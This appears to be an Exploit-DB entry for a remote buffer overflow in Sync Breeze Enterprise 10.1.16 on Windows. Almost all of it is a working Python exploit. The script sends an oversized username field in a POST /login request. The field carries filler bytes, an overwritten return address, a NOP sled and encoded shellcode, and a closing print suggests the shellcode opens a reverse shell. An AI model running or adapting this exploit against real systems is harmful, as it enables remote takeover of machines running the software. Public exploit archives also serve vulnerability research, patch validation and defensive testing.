Sync Breeze Enterprise 10.1.16 - 'POST' Remote Buffer Overflow

EDB-ID:

42886

CVE:

N/A


Author:

mschenk

Type:

remote


Platform:

Windows

Date:

2017-10-20


#!/usr/bin/python
import socket

try:
	print "\nSending evil buffer..."
 
	shellcode = ("\xba\x31\x13\x39\xe4\xdb\xd3\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
	"\x52\x31\x56\x12\x03\x56\x12\x83\xdf\xef\xdb\x11\xe3\xf8\x9e"
	"\xda\x1b\xf9\xfe\x53\xfe\xc8\x3e\x07\x8b\x7b\x8f\x43\xd9\x77"
	"\x64\x01\xc9\x0c\x08\x8e\xfe\xa5\xa7\xe8\x31\x35\x9b\xc9\x50"
	"\xb5\xe6\x1d\xb2\x84\x28\x50\xb3\xc1\x55\x99\xe1\x9a\x12\x0c"
	"\x15\xae\x6f\x8d\x9e\xfc\x7e\x95\x43\xb4\x81\xb4\xd2\xce\xdb"
	"\x16\xd5\x03\x50\x1f\xcd\x40\x5d\xe9\x66\xb2\x29\xe8\xae\x8a"
	"\xd2\x47\x8f\x22\x21\x99\xc8\x85\xda\xec\x20\xf6\x67\xf7\xf7"
	"\x84\xb3\x72\xe3\x2f\x37\x24\xcf\xce\x94\xb3\x84\xdd\x51\xb7"
	"\xc2\xc1\x64\x14\x79\xfd\xed\x9b\xad\x77\xb5\xbf\x69\xd3\x6d"
	"\xa1\x28\xb9\xc0\xde\x2a\x62\xbc\x7a\x21\x8f\xa9\xf6\x68\xd8"
	"\x1e\x3b\x92\x18\x09\x4c\xe1\x2a\x96\xe6\x6d\x07\x5f\x21\x6a"
	"\x68\x4a\x95\xe4\x97\x75\xe6\x2d\x5c\x21\xb6\x45\x75\x4a\x5d"
	"\x95\x7a\x9f\xf2\xc5\xd4\x70\xb3\xb5\x94\x20\x5b\xdf\x1a\x1e"
	"\x7b\xe0\xf0\x37\x16\x1b\x93\xf7\x4f\x93\xde\x90\x8d\xd3\x21"
	"\xda\x1b\x35\x4b\x0c\x4a\xee\xe4\xb5\xd7\x64\x94\x3a\xc2\x01"
	"\x96\xb1\xe1\xf6\x59\x32\x8f\xe4\x0e\xb2\xda\x56\x98\xcd\xf0"
	"\xfe\x46\x5f\x9f\xfe\x01\x7c\x08\xa9\x46\xb2\x41\x3f\x7b\xed"
	"\xfb\x5d\x86\x6b\xc3\xe5\x5d\x48\xca\xe4\x10\xf4\xe8\xf6\xec"
	"\xf5\xb4\xa2\xa0\xa3\x62\x1c\x07\x1a\xc5\xf6\xd1\xf1\x8f\x9e"
	"\xa4\x39\x10\xd8\xa8\x17\xe6\x04\x18\xce\xbf\x3b\x95\x86\x37"
	"\x44\xcb\x36\xb7\x9f\x4f\x56\x5a\x35\xba\xff\xc3\xdc\x07\x62"
	"\xf4\x0b\x4b\x9b\x77\xb9\x34\x58\x67\xc8\x31\x24\x2f\x21\x48"
	"\x35\xda\x45\xff\x36\xcf")

	inputBuffer = "A" * 780 + "\x83\x0c\x09\x10" + "C" * 4 + "\x90" * 10 + shellcode
	content="username="+inputBuffer+"&password=A"
	 
	buffer="POST /login HTTP/1.1\r\n"
	buffer+="Host: 192.168.176.139\r\n"
	buffer+="User-Agent: Mozilla/5.0 (X11; Linux_86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
	buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
	buffer+="Accept-Language: en-US,en;q=0.5\r\n"
	buffer+="Referer: http://192.168.176.139/login\r\n"
	buffer+="Connection: close\r\n"
	buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
	buffer+="Content-Length: "+str(len(content))+"\r\n"
	buffer+="\r\n"
	buffer+=content
	 
	s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
	s.connect(("192.168.176.139", 80))
	s.send(buffer)
	s.close()
	print "\nDone did you get a reverse shell?"
except: 
	print "\nCould not connect!"